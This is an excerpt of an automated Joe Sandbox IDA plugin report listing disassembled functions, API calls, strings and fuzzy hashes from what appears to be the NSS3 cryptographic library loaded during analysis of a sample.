Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=$5s/
API String ID: 391827415-3000204918
Opcode ID: 834c109e640aaa465cfe7055700bc98446b1ce6b19be43d0c5acbcda7ffd970c
Instruction ID: 2cd473fe27e126ac1ad18a32825119708825b4a9f6f943b209303f70602c28a2
Opcode Fuzzy Hash: 834c109e640aaa465cfe7055700bc98446b1ce6b19be43d0c5acbcda7ffd970c
Instruction Fuzzy Hash: 5851EAB1E122056BEB50DF24DC41AAF37B89F1624DF340024EC59E7741EB25E915CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE52D80 Relevance: 40.6, APIs: 22, Strings: 1, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CE52DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CE52E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CE52E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CE52E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CE24F1C,?,-00000001,00000000,?), ref: 6CE52E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CE24F1C,?,-00000001,00000000), ref: 6CE52E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CE52EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CE52EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CE52EF8
PR_Unlock.NSS3(?), ref: 6CE52F62
TlsGetValue.KERNEL32 ref: 6CE52F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6CE52F9E
PR_Unlock.NSS3(?), ref: 6CE52FCA
TlsGetValue.KERNEL32 ref: 6CE5301A
EnterCriticalSection.KERNEL32(?), ref: 6CE5302E
PR_Unlock.NSS3(?), ref: 6CE53066
PR_SetError.NSS3(00000000,00000000), ref: 6CE53085
PR_Unlock.NSS3(?), ref: 6CE530EC
TlsGetValue.KERNEL32 ref: 6CE5310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6CE53124
PR_Unlock.NSS3(?), ref: 6CE5314C

Part of subcall function 6CE39180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CE6379E,?,6CE39568,00000000,?,6CE6379E,?,00000001,?), ref: 6CE3918D
Part of subcall function 6CE39180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CE6379E,?,6CE39568,00000000,?,6CE6379E,?,00000001,?), ref: 6CE391A0

Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007AD
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007CD
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007D6
Part of subcall function 6CE007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CD9204A), ref: 6CE007E4
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,6CD9204A), ref: 6CE00864
Part of subcall function 6CE007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE00880
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,6CD9204A), ref: 6CE008CB
Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(?,?,6CD9204A), ref: 6CE008D7
Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(?,?,6CD9204A), ref: 6CE008FB

PR_SetError.NSS3(00000000,00000000), ref: 6CE5316D

Strings

5s/, xrefs: 6CE52D92

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID: 5s/
API String ID: 3383223490-340167759
Opcode ID: 4a1264bc170d81f05c89af45e9a4ba16f87476a2641801251026876ed44e0ed7
Instruction ID: 25dd0a6cbf8c024bde2e515dd4da700db606511de52afad44032566e3d2bafc1
Opcode Fuzzy Hash: 4a1264bc170d81f05c89af45e9a4ba16f87476a2641801251026876ed44e0ed7
Instruction Fuzzy Hash: DCF1AFB5E002189FDF01DF64D844BAEBBB4BF09318F644169EC04A7711EB32E9A5CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE74C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CE64F51,00000000), ref: 6CE74C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CE64F51,00000000), ref: 6CE74C5B
PR_smprintf.NSS3(6CF4AAF9,?,0000002F,?,?,?,00000000,00000000,?,6CE64F51,00000000), ref: 6CE74C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CE64F51,00000000), ref: 6CE74CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE74CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE74CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE74D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CE64F51,00000000), ref: 6CE74D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CE64F51,00000000), ref: 6CE74D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CE74D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CE74DA2
free.MOZGLUE(?), ref: 6CE74DB9
free.MOZGLUE(00000000), ref: 6CE74DCF

Strings

timeout, xrefs: 6CE74C91
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6CE74D9D
slotFlags, xrefs: 6CE74D34
rust, xrefs: 6CE74D22
0x%08lx=[%s %s], xrefs: 6CE74D80
ootT, xrefs: 6CE74D1A
any, xrefs: 6CE74C96
every, xrefs: 6CE74CA1
rootFlags, xrefs: 6CE74D47
%s,%s, xrefs: 6CE74C4B

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: c081659eba8065896f2cb4e68583d3ad220e4cf75013c6ff3aefe9a92174d63c
Instruction ID: c52d79259ecb8b6b1ee2efc4d44e155d349c2962775639ec8f3e22b0ceda5187
Opcode Fuzzy Hash: c081659eba8065896f2cb4e68583d3ad220e4cf75013c6ff3aefe9a92174d63c
Instruction Fuzzy Hash: 064180B1D10141ABEB229F259C44ABB3A79AF8230CF268126ED5557702E731D924CBF3

Uniqueness

Uniqueness Score: -1.00%

Function 6CE56CD0 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CE56910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CE56943
Part of subcall function 6CE56910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CE56957
Part of subcall function 6CE56910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CE56972
Part of subcall function 6CE56910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CE56983
Part of subcall function 6CE56910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CE569AA
Part of subcall function 6CE56910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CE569BE
Part of subcall function 6CE56910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CE569D2
Part of subcall function 6CE56910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CE569DF
Part of subcall function 6CE56910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CE56A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CE56D8C
free.MOZGLUE(00000000), ref: 6CE56DC5
free.MOZGLUE(?), ref: 6CE56DD6
free.MOZGLUE(?), ref: 6CE56DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CE56E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CE56E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CE56E72
free.MOZGLUE(?), ref: 6CE56EA7
free.MOZGLUE(?), ref: 6CE56EC4
free.MOZGLUE(?), ref: 6CE56ED5
free.MOZGLUE(00000000), ref: 6CE56EE3
free.MOZGLUE(?), ref: 6CE56EF4
free.MOZGLUE(?), ref: 6CE56F08
free.MOZGLUE(00000000), ref: 6CE56F35
free.MOZGLUE(?), ref: 6CE56F44
free.MOZGLUE(?), ref: 6CE56F5B
free.MOZGLUE(00000000), ref: 6CE56F65

Part of subcall function 6CE56C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CE5781D,00000000,6CE4BE2C,?,6CE56B1D,?,?,?,?,00000000,00000000,6CE5781D), ref: 6CE56C40
Part of subcall function 6CE56C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CE5781D,?,6CE4BE2C,?), ref: 6CE56C58
Part of subcall function 6CE56C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CE5781D), ref: 6CE56C6F
Part of subcall function 6CE56C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CE56C84
Part of subcall function 6CE56C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CE56C96
Part of subcall function 6CE56C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CE56CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CE56F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CE56FC5
PK11_GetInternalKeySlot.NSS3 ref: 6CE56FF4

Strings

+`l, xrefs: 6CE56D0D
5s/, xrefs: 6CE56CDC

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`l$5s/
API String ID: 1304971872-2653928404
Opcode ID: 83bef0747e41a6a1dba06cfe549e9d3dc6b2b79c6c9944a5faffdbb8d2528284
Instruction ID: 87468b4cc1fb28183ae9ae7656e2ba6207efcd612d87a389db2152586bc8a341
Opcode Fuzzy Hash: 83bef0747e41a6a1dba06cfe549e9d3dc6b2b79c6c9944a5faffdbb8d2528284
Instruction Fuzzy Hash: 71B15FB0E022099BDF10DFA5D845B9EBBB8AF0534CF640125E815E7741EB36E925CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE54C20 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CE54C4C
EnterCriticalSection.KERNEL32(?), ref: 6CE54C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CE54CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CE54CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CE54CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE54D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE54D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CE54DB7

Part of subcall function 6CEBDD70: TlsGetValue.KERNEL32 ref: 6CEBDD8C
Part of subcall function 6CEBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CEBDDB4

Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007AD
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007CD
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CD9204A), ref: 6CE007D6
Part of subcall function 6CE007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CD9204A), ref: 6CE007E4
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,6CD9204A), ref: 6CE00864
Part of subcall function 6CE007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE00880
Part of subcall function 6CE007A0: TlsSetValue.KERNEL32(00000000,?,?,6CD9204A), ref: 6CE008CB
Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(?,?,6CD9204A), ref: 6CE008D7
Part of subcall function 6CE007A0: TlsGetValue.KERNEL32(?,?,6CD9204A), ref: 6CE008FB

TlsGetValue.KERNEL32 ref: 6CE54DD7
EnterCriticalSection.KERNEL32(?), ref: 6CE54DEC
PR_Unlock.NSS3(?), ref: 6CE54E1B
PR_SetError.NSS3(00000000,00000000), ref: 6CE54E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE54E5A
PR_SetError.NSS3(00000000,00000000), ref: 6CE54E71
free.MOZGLUE(00000000), ref: 6CE54E7A
PR_Unlock.NSS3(?), ref: 6CE54EA2
TlsGetValue.KERNEL32 ref: 6CE54EC1
EnterCriticalSection.KERNEL32(?), ref: 6CE54ED6
PR_Unlock.NSS3(?), ref: 6CE54F01
free.MOZGLUE(00000000), ref: 6CE54F2A

Strings

5s/, xrefs: 6CE54C2C

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID: 5s/
API String ID: 759471828-340167759
Opcode ID: 4685b4fd779e0d05e5eab6110aaac20789efda1aeeb43d4580dcf2fa3fb2977f
Instruction ID: 753b6b070c1d623ade90bcd3e9adabd9390a9ad7b0163122f405e568bf12c36e
Opcode Fuzzy Hash: 4685b4fd779e0d05e5eab6110aaac20789efda1aeeb43d4580dcf2fa3fb2977f
Instruction Fuzzy Hash: F5B11171E002059FDB01EF28D844BAA77B4BF0631CF64412AE9159BB01EB36E935CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE408F0 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 230COMMON

Download Yara Rule

APIs

htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6CE4094D
htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE40953
htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6CE4096E
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6CE40974
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6CE4098F
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6CE40995

Part of subcall function 6CE41800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CE41860
Part of subcall function 6CE41800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6CE409BF), ref: 6CE41897
Part of subcall function 6CE41800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CE418AA
Part of subcall function 6CE41800: memcpy.VCRUNTIME140(?,?,?), ref: 6CE418C4

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6CE40B4F
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6CE40B5E
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6CE40B6B
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6CE40B78

Strings

base_nonce, xrefs: 6CE40B06
5s/, xrefs: 6CE40902
secret, xrefs: 6CE40A88
key, xrefs: 6CE40ACB
psk_id_hash, xrefs: 6CE409B5
exp, xrefs: 6CE40B36
info_hash, xrefs: 6CE409E0

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret$5s/
API String ID: 1637529542-2449580160
Opcode ID: 88d2c2cf70bf9dd9da03fe2f087550c707485026657804c18ab0bb636667b85c
Instruction ID: 38e63b24d7a330048925ffc84834d27d4c91dd38bf1a328891bcc9d06bb3f5e9
Opcode Fuzzy Hash: 88d2c2cf70bf9dd9da03fe2f087550c707485026657804c18ab0bb636667b85c
Instruction Fuzzy Hash: 61819C75604301AFD700CF65C880A9AFBF9EF8C208F14892DF99987752E731E919CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CEA28C0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 6CEA5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CEA5B56

TlsGetValue.KERNEL32 ref: 6CEA290A
EnterCriticalSection.KERNEL32(00000001), ref: 6CEA291E
TlsGetValue.KERNEL32 ref: 6CEA2937
EnterCriticalSection.KERNEL32(00000001), ref: 6CEA294B
PR_EnterMonitor.NSS3(?), ref: 6CEA2966
PR_EnterMonitor.NSS3(?), ref: 6CEA29AC
PR_ExitMonitor.NSS3(?), ref: 6CEA29D1
PR_EnterMonitor.NSS3(?), ref: 6CEA29F0
PR_EnterMonitor.NSS3(?), ref: 6CEA2A15
PR_EnterMonitor.NSS3(?), ref: 6CEA2A37
PR_ExitMonitor.NSS3(?), ref: 6CEA2A61
PR_ExitMonitor.NSS3(?), ref: 6CEA2A78
PR_ExitMonitor.NSS3(?), ref: 6CEA2A8F
PR_ExitMonitor.NSS3(?), ref: 6CEA2AA6

Part of subcall function 6CED9440: TlsGetValue.KERNEL32 ref: 6CED945B
Part of subcall function 6CED9440: TlsGetValue.KERNEL32 ref: 6CED9479
Part of subcall function 6CED9440: EnterCriticalSection.KERNEL32 ref: 6CED9495
Part of subcall function 6CED9440: TlsGetValue.KERNEL32 ref: 6CED94E4
Part of subcall function 6CED9440: TlsGetValue.KERNEL32 ref: 6CED9532
Part of subcall function 6CED9440: LeaveCriticalSection.KERNEL32 ref: 6CED955D

PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6CEA2AF9
free.MOZGLUE(?), ref: 6CEA2B16
PR_Unlock.NSS3(?), ref: 6CEA2B6D
PR_Unlock.NSS3(?), ref: 6CEA2B80

Strings

5s/, xrefs: 6CEA28CF

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
String ID: 5s/
API String ID: 2841089016-340167759
Opcode ID: a435ce9fe0e521e9190576753eba1d7123345d4114b5182555aaa8ff91eead38
Instruction ID: 0632f526f76eae3a6821d75732453b2a48c1b6654a46f0969f4ee37365f0fc19
Opcode Fuzzy Hash: a435ce9fe0e521e9190576753eba1d7123345d4114b5182555aaa8ff91eead38
Instruction Fuzzy Hash: 9F81B0B5A007009FDB209F76EC45797B7F5AB15308F24492CE89E96B11EB31E51ACB82

Uniqueness

Uniqueness Score: -1.00%

Function 6CE1C4B0 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 247COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE1C4D5

Part of subcall function 6CE6BE30: SECOID_FindOID_Util.NSS3(6CE2311B,00000000,?,6CE2311B,?), ref: 6CE6BE44

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CE1C516
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CE1C530
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE1C54E
NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6CE1C5CB
VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6CE1C712
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6CE1C725
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CE1C742
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CE1C751
PL_FinishArenaPool.NSS3(?), ref: 6CE1C77A
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6CE1C78F
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6CE1C7A9

Strings

5s/, xrefs: 6CE1C4BC
security, xrefs: 6CE1C63F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
String ID: security$5s/
API String ID: 1085474831-2291600020
Opcode ID: ea68b138c431dea5785bc325040aa0a24fe0c1088452a514d50e0d396a6b5312
Instruction ID: 82bca48b80e7ecdcd65c98282fe6ab2eb2393a1c2bf25fb7da438027397db0a3
Opcode Fuzzy Hash: ea68b138c431dea5785bc325040aa0a24fe0c1088452a514d50e0d396a6b5312
Instruction Fuzzy Hash: 6281FBB1E082089AEF10EA64DC45BEE7774EF0131CF344139E905E6F51E761D969CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7E8C0 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(0000001C,?,6CE7E853,?,FFFFFFFF,?,?,6CE7B0CC,?,6CE7B4A0,?,00000000), ref: 6CE7E8D9

Part of subcall function 6CE70D30: calloc.MOZGLUE ref: 6CE70D50
Part of subcall function 6CE70D30: TlsGetValue.KERNEL32 ref: 6CE70D6D

Part of subcall function 6CE7C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CE7DAE2,?), ref: 6CE7C6C2

PORT_ArenaMark_Util.NSS3(?), ref: 6CE7E972
PORT_ArenaMark_Util.NSS3(?), ref: 6CE7E9C2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE7EA00
PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6CE7EA3F
SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6CE7EA5A
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CE7EA81
SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6CE7EA9E
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CE7EACF
PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6CE7EB56
PK11_FreeSymKey.NSS3(00000000), ref: 6CE7EBC2
SECOID_FindOID_Util.NSS3(?), ref: 6CE7EBEC
free.MOZGLUE(00000000), ref: 6CE7EC58

Strings

Sl, xrefs: 6CE7E9CA, 6CE7EAAB
5s/, xrefs: 6CE7E8CD

Memory Dump Source

